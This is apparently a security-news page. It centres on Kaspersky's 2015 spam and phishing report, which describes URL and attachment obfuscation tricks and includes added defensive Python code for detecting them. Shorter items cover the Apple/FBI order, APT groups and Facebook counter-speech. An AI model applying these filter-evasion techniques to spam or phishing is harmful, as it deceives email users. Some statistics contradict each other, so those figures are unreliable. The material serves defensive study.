“Theory: either NSA/CIA dragnet and cryptanalysis capabilities are severely limited, or this is a test case to see how the courts respond.”
Judge Pym is requesting a software update that works only on Farook’s iPhone and runs only on government or Apple property.
At this point Apple has two options: demonstrate that it cannot technically comply with the order, or provide the requested software.
There is little time: Apple has five days to respond.
Kaspersky Security Bulletin. Spam and phishing in 2015
16.2.2016 Source: Kaspersky Spam
According to Kaspersky Lab, in 2015
The proportion of spam in email flows was 55.28%, which is 11.48 percentage points lower than in 2014.
79% of spam emails were no more than 2 KB in size.
15.2% of spam was sent from the US.
146,692,256 instances that triggered the ‘Antiphishing’ system were recorded.
Russia suffered the highest number of phishing attacks, with 17.8% of the global total.
Japan (21.68 %) took the lead in the ranking of unique users attacked by phishers.
34.33% of phishing attacks targeted online financial organizations (banks, payment systems and online stores).
New domain zones in spam
In early 2015, we registered a surge in the number of new top-level domains used for distributing mass mailings. This was caused by the growth in interest among spammers for the New gTLD program launched in 2014. The main aim of this program is to provide organizations with the opportunity to choose a domain zone that is consistent with their activities and the themes of their sites. The business opportunities provided by New gTLD were enthusiastically endorsed by the Internet community, and active registration of new domain names is still ongoing.
In 2015, proportion of #spam was 55.28% down from 66.76% in 2014 #KLReport
However, new domain zones almost immediately became an arena for the large-scale distribution of spam, as cybercriminals registered domains to spread mass mailings. At first, there was some logical connection between the theme of the spam and the domain name, but this changed as the year went on and the domain names used in mass mailings were, on the whole, not related to the subject of the spam. However, even now we still come across isolated cases where the connection is noticeable. For example, online dating sites are often placed in the .date zone.
This lack of any connection between the domain name and spam theme was mainly caused by the cost of new domains. The attackers try to choose the cheapest possible hosting because the sites will often be used just once for a specific spam mass mailing, so the domain name does not play a major role. Instead, the deciding factors tend to be the cost of the domains and the discounts that small registrars are willing to provide for bulk purchases.
Spammer tricks: methods for expressing domain names
Scammers try to make every email unique in order to bypass mass filtering and complicate the work of content filters. It is quite easy to make each text different by using similar characters from other alphabets, or by changing the word and sentence order, etc. But there is always the address of the spammer site – it can’t be changed so easily, and the whole point of sending out spam is for users to click a link to the advertised site. Over the years, spammers have come up with numerous ways to hide the spammer site from anti-spam filters: redirects to hacked sites, generation of unique links to short URL services, the use of popular cloud services as redirects, etc.
In 2015, 79% of spam emails were less than 2 KB in size #KLReport
In 2015, in addition to the methods mentioned above, spammers also focused on ways of expressing domain names and IP addresses. Here we take a closer look at these tricks by studying examples taken from a variety of spam messages.
Special features of the IP protocol: different IP formats
The standard way of writing an IPv4 address is the dotted-decimal format: the value of each byte is given as a decimal number from 0 to 255 and the bytes are separated by dots. However, browsers correctly interpret other formats too: octal and hexadecimal components, and the “dword” or undotted integer format, in which the four bytes are concatenated into one 32-bit number (write each byte as two hexadecimal digits, join them in address order, then convert the result to decimal). All these formats can be combined, writing each part of the address in a different notation, and the browser will still interpret it correctly.
These techniques are exploited by spammers. They write the same IP addresses in many different ways, including the method of combining different formats:
oct – hex
oct – dword
hex – dword
Addresses in hexadecimal format can be written with and without dots separating the numbers:
Additionally, 4294967296 (256^4) can be added any number of times to the number in the Integer format, and the result will still be interpreted as the same IP address.
In 2015, 15.2% of spam was sent from the US #KLReport
In the decimal format, the number 256 can be added to each part of the IP address any amount of times – as long as there is a three-digit result, the address will be interpreted correctly.
In the octal format, any number of leading zeros can be added to the IP address, and it will remain valid:
You can also insert any number of forward slashes in the address:
Although some legitimate libraries (for example the BSD inet_aton() family) accept these alternative spellings, the URL syntax standard (RFC 3986) permits only the dotted-decimal form for an IPv4 host in a link, so any other format inside a URL is itself a warning sign.
Obfuscation of an IP address, or how many ways can a number be written in Unicode
We have already written about the obfuscation of key words in spam using various Unicode ranges.
The same tricks can be applied to IP addresses and domain names. For IPs, in 2015 spammers often used Unicode digits from the so-called fullwidth range (U+FF10 to U+FF19). Normally these are used alongside CJK scripts so that Latin letters and digits do not look too small and narrow next to the ideographs.
We also came across figures from other ranges – figures in a circle, figures that are underscored, etc.:
Obfuscation of domains
As mentioned above, this trick also works with domains. Unicode has even more letter ranges than numerical. Spammers often used multiple ranges in a single link (changing them randomly in every email, thereby increasing the variability within a single mass mailing).
To make the links even more unique, rather than obfuscating the spammer site itself the scammers obfuscated short URL services where the links to the main site were generated in large quantities:
Interpreting URL symbols
URLs contain special symbols that spammers use to add ‘noise’. The main one is the @ symbol, which delimits user credentials in a URL. A link such as http://login:password@domain.com means that the user wants to enter the site domain.com with the username login and the password password. If the site does not require authentication, everything that precedes the @ symbol is simply ignored. We came across mass mailings in which spammers simply inserted the @ symbol in front of the domain name, and mass mailings in which the @ symbol was preceded by a random (or non-random) sequence:
It is interesting that this technique was used to obfuscate links; that is usually the prerogative of phishers. This method of presenting URLs can be used by fraudsters to trick users into thinking that a link leads to a legitimate site. For example, in the link http://google.com@spamdomain.com/anything the domain that the browser accepts is spamdomain.com, not google.com. However, in order to trick users, spammers have used another domain-related technique: they registered lots of domains beginning with com-. With third-level domains the links in emails looked like this: http://learnmore.com-eurekastep.eu/find
If you don’t look carefully, you might think that the main domain is learnmore.com, whereas it is in fact com-eurekastep.eu.
In addition to the @ symbol, scammers filled links with other symbols: www.goo&zwj.g&zwjl/0Gsylm.
In the example above, the “&zwj” fragment has been inserted at random positions in the goo.gl domain, making the link unique in each email. It is the HTML entity for the zero-width joiner, a control character used to join individual glyphs in Indic scripts and to combine several emoji into one symbol. Inside a domain it carries no meaning; it simply obfuscates the link.
Yet another method of obscuring links is the use of a “soft hyphen” (SHY). In HTML, SHY is a special symbol that is not visible in the text, but if a word containing a special symbol doesn’t fit in at the end of a line, the part after the special symbol is moved to the next line, while a hyphen is added to the first part. Typically, browsers and email clients ignore this symbol inside links, so spammers can embed it anywhere in a URL and as often as they like. We came across a mass mailing where soft hyphens had been inserted in the domain more than 200 times (hexadecimal encoding):
Besides the soft hyphen, other special characters turn up in domains: the ordinal indicator (&ordm;) and the superscripts 1 and 2 (&sup1;, &sup2;), which some browsers interpret as the letter “o” and the digits “1” and “2” respectively.
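To see how all of these spellings collapse to a single destination, here is an added Python example (it is not code from the Kaspersky report) that undoes the tricks described above: HTML entities such as &zwj; and &shy;, fullwidth, circled and superscript digits, zero-width and soft-hyphen characters, the userinfo-before-@ trick, and the octal/hex/dword/short IPv4 spellings. The sample links are constructed for the example; reducing an oversized dword modulo 2^32 mirrors the lenient “add 4294967296” behaviour the report describes and is an assumption, as is the last-two-labels approximation of the registrable domain (no public-suffix list is consulted).

```python
import html
import re
import unicodedata
from urllib.parse import urlsplit

# Code points that are invisible when rendered and illegal in a hostname, which spammers
# sprinkle into domains: soft hyphen, zero-width space/non-joiner/joiner, word joiner, BOM.
INVISIBLE = frozenset("\u00ad\u200b\u200c\u200d\u2060\ufeff")
_PART = re.compile(r"0[xX][0-9a-fA-F]*|[0-9]+")


def _part_value(part: str) -> int:
    """One dotted component under inet_aton rules: 0x.. is hex, a leading 0 is octal, else decimal."""
    if not _PART.fullmatch(part):
        raise ValueError(part)
    if part[:2].lower() == "0x":
        return int(part[2:] or "0", 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)               # "09" raises, exactly as inet_aton rejects it
    return int(part)


def canonical_ipv4(host: str):
    """Dotted-decimal form of any octal/hex/dword/short IPv4 spelling, or None if not an IPv4."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_part_value(p) for p in parts]
    except ValueError:
        return None
    *head, last = values
    if any(v > 255 for v in head):
        return None
    rest = 4 - len(head)                  # how many bytes the last component must fill
    if len(parts) == 1:
        last %= 2 ** 32                   # assumption: mirror the lenient "add 2^32" behaviour the report describes
    elif last >= 256 ** rest:
        return None
    n = 0
    for v in head:
        n = (n << 8) | v
    n = (n << (8 * rest)) | last
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def reveal(raw_url: str) -> dict:
    """Peel off the obfuscation layers and report the host a browser would actually contact."""
    url = html.unescape(raw_url)                                # &zwj; &shy; &sup2; ... -> code points
    url = unicodedata.normalize("NFKC", url)                    # fullwidth/circled/superscript digits -> ASCII
    url = "".join(ch for ch in url if ch not in INVISIBLE)      # drop zero-width joiners and soft hyphens
    parts = urlsplit(url)
    host = parts.hostname or ""                                 # urlsplit treats "login:password@" as userinfo
    ip = canonical_ipv4(host)
    return {
        "host": host,
        "ip": ip,
        "bait": parts.username,        # e.g. "google.com" in http://google.com@spamdomain.com/
        # simplification: the last two labels stand in for the registrable domain (no public-suffix list)
        "registrable": ip or ".".join(host.split(".")[-2:]),
    }


# Constructed sample links modelled on the tricks in the report (not real spam URLs).
FULLWIDTH_DWORD = "".join(chr(0xFF10 + int(d)) for d in "2130706433")   # 127.0.0.1 as a dword in fullwidth digits
SAMPLES = [
    "http://0x7f.0.0.1/",                          # hex and decimal components mixed
    "http://0000000177.0x0.0.01/",                 # octal with leading zeros, hex, octal
    "http://0x7f000001/",                          # undotted hexadecimal
    "http://6425673729/",                          # 2130706433 + 4294967296
    "http://" + FULLWIDTH_DWORD + "/",
    "http://1&sup2;7.0.0.1/",                      # superscript two rendered as "2"
    "http://google.com@spamdomain.com/anything",   # userinfo bait before "@"
    "http://learnmore.com-eurekastep.eu/find",     # "com-" prefix on the real domain
    "http://www.goo&zwj;.g&zwj;l/0Gsylm",          # zero-width joiners inside goo.gl
    "http://exam&shy;&shy;&shy;ple.com/",          # repeated soft hyphens
]

if __name__ == "__main__":
    for link in SAMPLES:
        r = reveal(link)
        print(f"{link!r:48} -> host={r['host']!r} ip={r['ip']} bait={r['bait']}")
```

Run as a script it prints each constructed sample beside the host a browser would actually contact. In a mail filter the canonical host (or the dotted-decimal IP) is the value to match against a blocklist, not the raw link text, and a host that only parses as an IPv4 in one of the non-standard spellings is worth a score on its own.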
Reiteration of a popular domain name
Another original way of adding noise to links used by spammers in 2015 was the use of a well-known domain as a redirect. This trick is not new, but this time the fraudsters added the same well-known domain several times:
Emails without a URL
It is also worth mentioning those cases where no domains were used at all. Instead of a URL, a number of spam mailings contained a QR-code.
Other mass mailings prompted the user to enter a random sequence in a search engine; the link to the site appeared at the top of the search results:
World events in spam
The next Olympic Games in Brazil only take place in the summer of 2016, but already in 2015 fraudulent notifications of lottery wins dedicated to this popular sporting event were being registered. These included emails containing an attached PDF file that informed recipients that their address had been randomly selected out of millions of email addresses. In order to claim the prize it was necessary to respond to the email and provide specific personal information. In addition to the text, the attachments contained different graphical elements (logos, photos, etc.). The fake lottery win notifications, which were of a considerable length, were often sent out with attachments to bypass spam filtering.
In 2015, ‘Nigerian’ scammers exploited political events in Ukraine, the war in Syria, the presidential elections in Nigeria and earthquake in Nepal to convince recipients that their stories were genuine. The authors primarily sought help to invest huge sums of money or asked for financial assistance. These so-called Nigerian letters made use of the customary tricks to deceive recipients and extort money from them.
Emails about the war in Syria often mentioned refugees and Syrian citizens seeking asylum in Europe. Some emails were made to look as if they had been sent directly from refugee camps and contained complaints about the poor conditions.
Statistics
Proportion of spam in email traffic
In 2015, the proportion of spam in email traffic was 55.28%, which is 11.48 percentage points lower than the previous year.
The proportion of spam in email traffic, 2015
The most noticeable drop was registered in the first months of 2015, from 61.86% in January to 53.63% in April. Fluctuations throughout the rest of the year were insignificant, within 1-2 percentage points.
Sources of spam by country
Sources of spam by country, 2015
In 2015, there was a slight change to the top three sources of spam: China (6.12%) dropped to fourth although the proportion of spam distributed from that country actually increased by 0.59 percentage points. Replacing it in third place was Vietnam (6.13%), which saw 1.92 percentage points added to its share. Russia (6.15%) remained in second place with an increase of 0.22 percentage points, while the US (15.16%) remained the undisputed leader despite a decrease of 1.5 percentage points.
In 2015, users in USA were targeted by 4.92% of worldwide malicious emails #KLReport
As was the case in 2014 Germany came fifth (4.24%), with its contribution increasing by 0.24 percentage points. The rest of the Top 10 consisted of Ukraine (3.99%, +0.99 p.p.), France (3.17%, +0.62 p.p.), India (2.96%, no change), Argentina (2.90%, -0.65 p.p.) and Brazil (2.85%, +0.42 p.p.).
The size of spam emails
The size of spam emails in 2015
The proportion of super-short spam emails (under 2 KB) grew in 2015 and averaged 77.26%, while the share of emails sized 2-5 KB fell to 9.08%. The general trend of 2015 was a reduction in the size of emails.
Malicious attachments in email
The Top 10 malicious programs spread by email in 2015
The notorious Trojan-Spy.HTML.Fraud.gen remained the most popular malicious program sent by email. This program is a fake HTML page sent via email that imitates an important notification from a large commercial bank, online store, or software developer, etc. This threat appears as an HTML phishing website where a user has to enter his personal data, which is then forwarded to cybercriminals.
Trojan-Downloader.HTML.Agent.aax was in second, while ninth and tenth positions were occupied by Trojan-Downloader.HTML.Meta.as and Trojan-Downloader.HTML.Meta.ay respectively. All three are HTML pages that, when opened, redirect users to a malicious site. Once there, a victim usually encounters a phishing page or is offered a download: Binbot, a binary option trading bot. These malicious programs spread via email attachments, and the only difference between them is the link that redirects users to the rigged sites.
Third was Trojan-Banker.Win32.ChePro.ink. This downloader is a CPL applet (a Control Panel component) that downloads Trojans designed to steal confidential financial information. Most malicious programs of this type are aimed at Brazilian and Portuguese banks.
Email-Worm.Win32.Mydoom.l was in fourth place. This network worm spreads as an email attachment via file-sharing services and writable network resources. It harvests email addresses from infected computers so they can be used for further mass mailings. To send the email, the worm directly connects to the SMTP server of the recipient.
Next came Trojan.JS.Agent.csz and Trojan-Downloader.JS.Agent.hhi, which are downloaders written in JavaScript. These malicious programs may contain several addresses (domains) which the infected computer consecutively calls. If the call is successful, a malicious EXE file is downloaded in the temp folder and run.
Trojan-PSW.Win32.Fareit.auqm was in eighth position. Fareit Trojans steal browser cookies and passwords from FTP clients and email programs and then send the data to a remote server run by cybercriminals.
Malware families
Throughout the year, Upatre remained the most widespread malware family. Malware from this family downloads the Trojan banker known as Dyre/Dyreza/Dyzap.
MSWord.Agent and VBS.Agent occupied second and third places respectively. To recap, MSWord.Agent programs are DOC files with an embedded macro written in Visual Basic for Applications (VBA) that runs when the document is opened and downloads and runs other malware, such as Andromeda. VBS.Agent, as the name suggests, uses an embedded VBS script; to download and run other malware on the user’s computer, programs of this family use the ADODB.Stream object.
The Andromeda family came fourth. These programs allow the attackers to secretly control infected computers, which often become part of a botnet. Noticeably, in 2014 Andromeda topped the rating of the most widespread malware families.
In 2015, #Japan (21.68 %) took the lead in the ranking of unique users attacked by phishers #KLReport
The Zbot family came fifth. Representatives of this family are designed to carry out attacks on servers and user computers, and also for capturing data. Although ZeuS/Zbot is capable of carrying out various harmful actions, it is most often used to steal banking information.
Countries targeted by malicious mailshots
Distribution of email antivirus verdicts by country, 2015
For the previous three years, the Top 3 countries most often targeted by mailshots has remained unchanged – the US, the UK and Germany. However, in 2015, spammers altered their tactics and targets. As a result, Germany came first (19.06%, +9.84 p.p.) followed by Brazil (7.64%, +4.09 p.p.), which was only sixth in 2014.
The biggest surprise in Q3, and the whole of 2015, was Russia’s rise to third place (6.30%, +3.06 p.p.). To recap, in 2014 Russia was ranked eighth with no more than 3.24% of all malicious spam being sent to the country.
We would like to believe that despite the trend seen in recent quarters, the number of malicious mass mailings sent to Russia will decrease. As for the total number of malicious attachments sent via email, their number is likely to grow in 2016 and the theft of personal information and Trojan ransomware will occupy the top places.
Special features of malicious spam
In spam traffic for 2015 we registered a burst of mass mailings with macro viruses. The majority of emails containing macro viruses in Q1 were sent in attachments with a .doc or .xls extension and belonged to the Trojan downloader category designed to download other malicious programs.
As a rule, the malicious attachments imitated various financial documents: notifications about fines or money transfers, unpaid bills, payments, complaints, e-tickets, etc. They were often sent on behalf of employees from real companies and organizations.
In 2015, 34.33% of phishing attacks targeted clients of financial organizations #KLReport #banking
The danger posed by macro viruses is not restricted to their availability and ease of creation. A macro virus can infect not only the document that is opened initially but also a global macro common to all similar documents and consequently all the user’s documents that use global macros. Moreover, the VBA language is sufficiently functional to be used for writing malicious code of all kinds.
In 2015, cybercriminals specializing in malicious spam continued to distribute malware in non-standard archive formats (.cab, .ace, .7z, .z, .gz). These formats were introduced long ago and are used by specialists in software development and installation, but they are largely unknown to ordinary users, unlike ZIP and RAR. Another difference is the high degree of file compression. These malicious archives were passed off as a variety of attachments (orders, invoices, photographs, reports, etc.) and contained different malicious programs (Trojan-Downloader.Win32.Cabby, Trojan-Downloader.VBS.Agent.azx, Trojan-Spy.Win32.Zbot.iuk, HawkEye Keylogger, etc.). The vast majority of emails were in English, though there were messages in other languages.
In 2014, cybercriminals were particularly active in sending out fake emails from mobile devices and notifications from mobile apps containing malware and adverts. In 2015, the mobile theme continued: malicious programs were distributed as .apk and .jar files, which are in fact archived executable application packages for mobile devices. Files with the .jar extension are ZIP archives containing a Java program, primarily intended to be launched on a (Java ME) mobile phone, while .apk files are used to install applications on Android.
In particular, cybercriminals masked the mobile encryption Trojan SLocker behind a file containing updates for Flash Player: when run, it encrypts images, documents and video files stored on the device. After launching, a message is displayed telling the user to pay a fee in order to decrypt his files. Another .jar archive contained Backdoor.Adwind written in Java. This multi-platform malicious program can be installed not only on mobile devices but also on Windows, Mac and Linux.
The attackers who send out malware in files for mobile devices are most probably hoping that recipients using email on a mobile device will install the malicious attachment.
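An added Python example (not code from Kaspersky or the report) of the attachment triage these tricks call for: it identifies the real container type from magic bytes rather than the file extension, recognizes .apk and .jar files as ZIP archives by their member names, and flags the non-standard archive formats listed above, an executable container, an extension that disagrees with the content, and a double extension. The attachments it inspects are constructed in memory for the example; the signature table and extension mapping are the author’s own assumptions and not exhaustive.

```python
import gzip
import io
import zipfile

# Container signatures a mail gateway can check regardless of the claimed extension.
# (offset, magic bytes, type)
MAGIC = [
    (0, b"PK\x03\x04", "zip"),
    (0, b"7z\xbc\xaf\x27\x1c", "7z"),
    (0, b"\x1f\x8b", "gzip"),
    (0, b"\x1f\x9d", "compress-z"),
    (0, b"MSCF", "cab"),
    (7, b"**ACE**", "ace"),
    (0, b"Rar!\x1a\x07", "rar"),
    (0, b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2"),   # legacy .doc/.xls, the macro carriers
    (0, b"MZ", "pe"),
    (0, b"%PDF", "pdf"),
]
EXPECTED_EXT = {   # extensions under which each real type is legitimately sent (assumption)
    "zip": {"zip"}, "jar": {"jar"}, "apk": {"apk"},
    "ooxml": {"docx", "docm", "xlsx", "xlsm", "pptx"},
    "7z": {"7z"}, "gzip": {"gz", "tgz"}, "compress-z": {"z"}, "cab": {"cab"},
    "ace": {"ace"}, "rar": {"rar"}, "ole2": {"doc", "xls", "ppt"},
    "pe": {"exe", "dll", "scr", "cpl"}, "pdf": {"pdf"},
}
UNUSUAL_ARCHIVES = {"cab", "ace", "7z", "compress-z", "gzip"}   # the formats the report lists
EXECUTABLE_CONTAINERS = {"pe", "apk", "jar"}
DECOY_EXTS = {"pdf", "doc", "xls", "jpg", "png", "txt"}         # "photo.jpg.exe"-style decoys


def sniff(data: bytes) -> str:
    """Identify the real container type from magic bytes; refine ZIP by its member names."""
    for offset, sig, kind in MAGIC:
        if data[offset:offset + len(sig)] != sig:
            continue
        if kind != "zip":
            return kind
        try:
            names = set(zipfile.ZipFile(io.BytesIO(data)).namelist())
        except zipfile.BadZipFile:
            return "zip"
        if "AndroidManifest.xml" in names:       # check before the manifest: APKs carry one too
            return "apk"
        if "META-INF/MANIFEST.MF" in names:
            return "jar"
        if "[Content_Types].xml" in names:
            return "ooxml"
        return "zip"
    return "unknown"


def triage(filename: str, data: bytes) -> dict:
    """Flag the attachment tricks described in the report for one file."""
    parts = filename.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    kind = sniff(data)
    flags = set()
    if kind in UNUSUAL_ARCHIVES:
        flags.add("unusual-archive")
    if kind in EXECUTABLE_CONTAINERS:
        flags.add("executable-container")
    if kind != "unknown" and ext not in EXPECTED_EXT.get(kind, set()):
        flags.add("extension-mismatch")
    if len(parts) >= 3 and parts[-2] in DECOY_EXTS:
        flags.add("double-extension")
    return {"name": filename, "ext": ext, "type": kind, "flags": flags}


def zip_with(*members: str) -> bytes:
    """Build a minimal ZIP in memory (constructed test data, not a real sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for m in members:
            z.writestr(m, b"x")
    return buf.getvalue()


SAMPLES = [   # constructed attachments modelled on the report's descriptions
    ("Flash_Player_Update.apk", zip_with("AndroidManifest.xml", "classes.dex")),
    ("Invoice_0215.jar", zip_with("META-INF/MANIFEST.MF", "a/Loader.class")),
    ("order_details.7z", b"7z\xbc\xaf\x27\x1c" + bytes(32)),
    ("photo.jpg.exe", b"MZ" + bytes(62)),
    ("report.doc", zip_with("[Content_Types].xml", "word/document.xml")),
    ("scan.pdf", b"%PDF-1.4\n%%EOF\n"),
    ("payment.gz", gzip.compress(b"constructed payload")),
]

if __name__ == "__main__":
    for name, blob in SAMPLES:
        r = triage(name, blob)
        print(f"{name:26} {r['type']:10} {sorted(r['flags'])}")
```

The point of sniffing first is that the extension is attacker-controlled while the first bytes are not: an .apk or .jar that is really a ZIP, or a Word document that is really a PE file, is caught the same way. A production filter would extend the table (and unpack archives recursively), but the decision logic stays the same.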
With every year, cybercriminals are becoming more interested in mobile devices. This is primarily due to the constant increase in activity by mobile users (using messengers and other methods of exchanging data) and the migration of different services (e.g., financial transactions) to mobile platforms, and of course, one user may have several mobile devices. Secondly, it is due to the emergence of various popular apps that can be used by cybercriminals both directly (for sending out spam, including malicious spam) and indirectly (in phishing emails). For example, users of the popular messenger WhatsApp fall victim to not only traditional advertising spam but also virus writers. Mobile users should be especially careful because cybercriminal activity in this sphere is only likely to increase.
Phishing
Main trends
In 2015, the Anti-Phishing system was triggered 148,395,446 times on computers of Kaspersky Lab users. 60% (89,947,439) of those incidents were blocked by deterministic components and 40% (58,448,007) by heuristic detection components.
Methods of distributing phishing content
The methods used by cybercriminals to spread phishing content have long gone beyond the framework of email clients. For example, one of the most popular ways of distributing phishing pages is pop-up ads. In 2015, we came across a variety of fraudulent schemes utilizing this simple trick: the fake page automatically opens in the browser when a user visits certain sites, including legitimate ones, but uses pop-up advertising.
Cybercriminals used this technique to attack customers of Russian banks in the third and fourth quarters of 2015.
The fraudulent page to which the victim is redirected by a pop-up advert
Other popular themes of the year
As we mentioned in Q1, the contribution of the ‘Delivery company’ category is very small (0.23%), but it has recently experienced a slight increase (+0.04 p.p.). In addition, DHL, one of the companies in this category, was among the Top 100 organizations most often targeted by phishers.
This method – an email sent on behalf of a delivery firm – is often used by fraudsters to distribute malicious attachments, gather personal information and even collect money.
Phishing email sent on behalf of FedEx
The attackers are especially active in this category in the run-up to holidays when people tend to buy presents using popular delivery services.
Email tricks
Scammers have long made successful use of PDF attachments in phishing attacks. These files are usually a form for entering personal information that is sent to the fraudsters by pressing a button in the file. However, in 2015 we saw a surge of emails in which the text message and the link to the phishing page were included in the PDF document. The text in the body of the message was reduced to a minimum to bypass spam filtering.
These tricks are used against organizations in all categories. In 2015, many attacks of this type targeted banking and mail organizations.
Example of a phishing email. The body of the message contains only the text imitating the heading of the email to which this email is allegedly responding. The email has an attached PDF file that contains the link to the phishing page.
We came across numerous PDF files that redirected victims to phishing websites. The fraudsters encouraged the user to click on ‘View pdf File’ to read the contents of the file.
A phishing email with an attached PDF file containing a redirect to a phishing website
The geography of attacks
Top 10 countries by percentage of attacked users
Japan had the highest proportion of users subjected to phishing attacks (21.68%), a 2.17 p.p. increase from the previous year.
The percentage of users on whose computers the anti-phishing system was triggered out of the total number of users of Kaspersky Lab products in the country, 2015
Top 10 countries by percentage of attacked users
Japan 21.68%
Brazil 21.63%
India 21.02%
Ecuador 20.03%
Mozambique 18.30%
Russia 17.88%
Australia 17.68%
Vietnam 17.37%
Canada 17.34%
France 17.11%
Last year’s leader, Brazil (21.63%), fell to second place with a drop of 5.77 percentage points in the number of attacked users. It was followed by India (21.02%, -2.06 p.p.) and Ecuador (20.03%, -2.79 p.p.).
The distribution of attacks by country
Russia accounted for the greatest share of phishing attacks, with 17.8% of the global total, an increase of 0.62 percentage points compared to the previous year.
Distribution of phishing attacks by country in 2015
Behind Russia in second place was Brazil (8.74%, +1.71 p.p.), followed by India (7.73%, +0.58 p.p.), the US (7.52%, +0.32 p.p.), with Italy rounding off the Top 5 (7.04%, +1.47 p.p.).
Organizations under attack
The statistics on organizations used in phishing attacks are based on the triggering of the heuristic component in the anti-phishing system. The heuristic component is triggered when a user tries to follow a link to a phishing page and there is no information about the page in Kaspersky Lab’s databases.
Distribution of organizations subject to phishing attacks by category, 2015
In 2015, we saw significant growth in the proportion of phishing attacks on organizations belonging to the ‘Online finances’ category (34.33%, +5.59 pp): they include the ‘Banks’, ‘Payment Systems’ and ‘Online stores’ categories. Of note is the increase in the percentage of targeted organizations in the ‘Telephone and Internet service providers’ (5.50%, +1.4 p.p.) and ‘Social networking sites and blogs’ (16.40%, +0.63 p.p.) categories.
Top 3 organizations attacked
Organization % of detected phishing links
1 Yahoo! 14.17
2 Facebook 9.51
3 Google 6.8
In 2015, Yahoo! was once again the organization targeted most by phishers, although its share decreased considerably – 14.17% vs 23.3% in 2014. We presume this decrease is a result of the company combating these fake domains. We see that Yahoo!, as well as many other organizations, registers lots of domains that could theoretically be used by the attackers as they are derived from the original domain name.
Conclusion and forecasts
In 2015, the proportion of spam in email traffic decreased by 11.48 percentage points and accounted for 55.28%. The largest decline was observed in the first quarter; from April the fluctuations stabilized and were within a few percentage points. This reduction was caused by the migration of advertising for legal goods and services from spam flows to more convenient and legal platforms (social networks, coupon services, etc.), as well as by the expansion of the “gray” zone in mass mailings (mass mailings sent both to voluntary subscribers and to people who have not given their consent). We assume the share of spam will continue to decrease in 2016, though the decline will be insignificant.
The number of malicious and fraudulent messages, however, will increase. It is possible that the attackers will once again make use of their customary tricks as was the case in 2015 (mass mailings of macro viruses and non-standard attachment extensions). The mobile theme may also become yet another weapon in the cybercriminals’ arsenal to spread malware and fraudulent spam.
The number of new domains created by spammers especially for distributing mass mailings will continue to grow. We also expect to see an expansion in new domain zones used as spammer resources.
APT Groups don’t go under the grid after a successful attack!
16.2.2016 APT
What has happened to some of the APT groups behind high-profile cyber attacks? They no longer go dark after being outed, a behavior completely different from the past.
Everyone remembers the Sony attack of 2014, which the US Government blamed on the North Korean Government and which was materially executed by a hacking group dubbed GOP (Guardians of Peace). In the past, the APT groups behind major attacks went underground for some time until the dust settled, but now more and more hacking crews remain active after a big score, using information gathered in the successful attack to target further victims.
Juan Andres Guerrero-Saade, senior security researcher at Kaspersky Lab, expressed his opinion on the Sony hack.
“They didn’t disappear when the dust settled,” he said.
Last week, during the security summit in Tenerife, Guerrero-Saade and Jaime Blasco gave an update on the Sony attackers:
“It took us two years to correlate all of the information we had … The same people were launching campaigns using information from the Sony attack,”
Why don’t threat groups remain under the radar after a big score?
Kurt Baumgartner, principal security researcher at Kaspersky Lab, argues that in the past APT groups “would immediately shut down their infrastructure when they were reported on. You just didn’t see the return of an actor sometimes for years at a time.”
Baumgartner used the example of Darkhotel, a Korean-speaking attack group best known for compromising the Wi-Fi networks of luxury hotels in order to target high-level executives. Even though Darkhotel is no longer attacking hotels, it is not hiding either: in July it was discovered using an Adobe Flash zero-day exploit that had been exposed in the Hacking Team data breach.
“Within 48 hours, they took the Flash exploit down … They left a loosely configured server”.
Darkhotel does not look worried about exposure: “The hotel [attack] activity focused on business travelers has come to an end, but the other operations are highly active.”
Several other groups are assumed to behave in a similar way; the Equation Group, for example, which many experts have linked to the NSA, is believed to have changed its communication methods to avoid detection.
“I would assume they are active but just changed their” communications, explained Costin Raiu, director of the global research and analysis team at Kaspersky Lab. “We don’t detect them anymore.”
This pattern is seen over and over among hacking groups, and it looks as if notoriety no longer stops them.
Facebook Offering You $1000 to Run Advertisement Against Terrorism
16.2.2016 Social
Facebook Offering $1,000 Credits If You Want to Run Advertisements Against ISIS and Terrorism
Over the past few years we have seen steady growth in the online recruitment of jihadists by radical groups through social networking sites.
ISIS leads this online recruitment, leveraging the enormous reach of Twitter and Facebook to radicalize young minds, spread its message and recruit foreign supporters for its fights.
Many ISIS militants maintain extremely active accounts on the popular social media platforms and have a strong presence on the most popular encrypted messaging app Telegram with more than 100,000 followers.
This issue had impacted the society deeply. Recent examples include last year’s Paris attack in which ISIS used some popular messaging apps to plot the attack.
As the Dark Siders of social media began to turn this platform into a Terror-Picker, the White Siders of the same social media came under a single roof to declare fight against terrorism, and rage cyber war against these anti-humans.
Facebook Buckled Up to Fight against Terrorism
Facebook has also joined the front line of the fight against terrorism. The social media giant has come up with a plan to minimize the presence of the caliphate group on its platform.
Similar efforts have previously been made by the Anonymous hacktivist collective, which conducted planned operations such as OpISIS and OpParis, expunging ISIS channels from Twitter and Telegram.
Recently, Facebook introduced a new program, dubbed "Counter-Speech," that offers advertising credits of up to $1,000 to those who raise their voice against hate speech and terror propaganda.
The strategy is to reach those who have been influenced by radical propaganda with counter-messaging that discredits the groups trying to brainwash them.
So, rather than simply removing or blocking the extremist Facebook pages that spread hatred among their followers, Facebook is focusing on educating more and more young minds in an effort to fight terrorism.
The First Person to Receive $1000 Credit
Arbi el Ayachi, a German comedian, benefited from the newly released Facebook plan after he released a video last year joking that eating halal meat is poisonous to Christians.
How did the idea strike?
The idea was outlined by Facebook Chief Operating Officer Sheryl Sandberg while speaking at the World Economic Forum last month.
Sandberg backed up the idea by referring to a recent campaign in Germany in which the group "Laut gegen Nazis" (an anti-neo-Nazi group) targeted the Facebook page of the far-right NPD by getting members to like (a "Like Attack") and post on the page.
"Rather than scream and protest, they got 100,000 people to like the page, who did not like the page and put messages of tolerance on the page, so when you got to the page, it changed the content and what was a page filled with hatred and intolerance was then tolerance and messages of hope" Sandberg stated.
Cyber World Fights Against Terrorism
Gradually, the operation against terrorist organizations hit the headlines and grabbed the attention of other tech giants like Google, YouTube, and Twitter.
YouTube has removed thousands of radical videos from its platform.
Twitter has suspended 125,000 accounts belonging to jihadi members since mid-2015.
